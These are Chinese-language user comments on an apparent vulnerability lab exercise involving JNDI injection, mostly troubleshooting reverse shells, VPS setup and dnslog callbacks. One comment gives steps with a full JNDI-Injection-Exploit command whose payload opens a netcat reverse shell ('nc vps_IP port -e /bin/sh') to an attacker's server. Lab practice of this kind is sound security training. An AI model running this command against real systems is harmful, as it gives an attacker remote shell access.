ctfliu @ 2023-06-07 23:20:34 👍0
不懂,跟着流程走的。阿里云开启虚拟linux,在安全组规则放开所有端口。根据别人的wp走就行。
xiaopengy @ 2023-06-07 23:20:34 👍0
请问反弹shell的时候vps端为什么报这个错? 我的vps机是kali的系统。 java.lang.IllegalAccessError: superclass access check failed: class com.feihong.ldap.template.TomcatEchoTemplate (in unnamed module @0x5e91993f) cannot access
Striker123456 @ 2023-06-07 23:20:34 👍0
弹回的shell执行不了命令,不知道是不是我的服务器的问题
jack12138 @ 2023-06-07 23:20:34 👍1
dnslog出不来,但是可以弹shell,估计是禁用dns请求啦?
Wencf01 @ 2024-04-07 23:20:34 👍0
我也是能弹shell,但是弹不dnslog
Striker123456 @ 2023-06-07 23:20:34 👍0
必须要外网的VPS么
Striker123456 @ 2023-06-07 23:20:34 👍0
@简单的很遗憾 哎哎,我的意思是公网地址的VPS也可以把
简单的很遗憾 @ 2023-06-07 23:20:34 👍1
这个是需要的,没有vps可以vulhub本地复现嘛
1317554973 @ 2023-06-07 23:20:34 👍0
什么靶场啊 我都用了6金币都没成功 我百度上找一个靶场就直接成功了 骗我金币 搞毛啊
13633953641aaa @ 2023-06-07 23:20:34 👍0
有没有师傅遇到vps开启ldap后 telnet -p 不通的问题
SecI302 @ 2023-06-07 23:20:34 👍0
1.通过ceye是无法判断是否存在漏洞的,但是能正常反弹shell 2.下载JNDI注入工具 3. 启动工具命令java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc vps_IP port -e /bin/sh" -A vps_IP启动rmi或者ldap服务设置IP工具会返回服务地址的(红色的) 4.复
mamba24 @ 2023-06-07 23:20:34 👍0
最后一步了 端口都是通的 就是弹不回来
裂开,不如自己搭建个本地的复现效率高,同样的步骤,在这里就搞不了还麻烦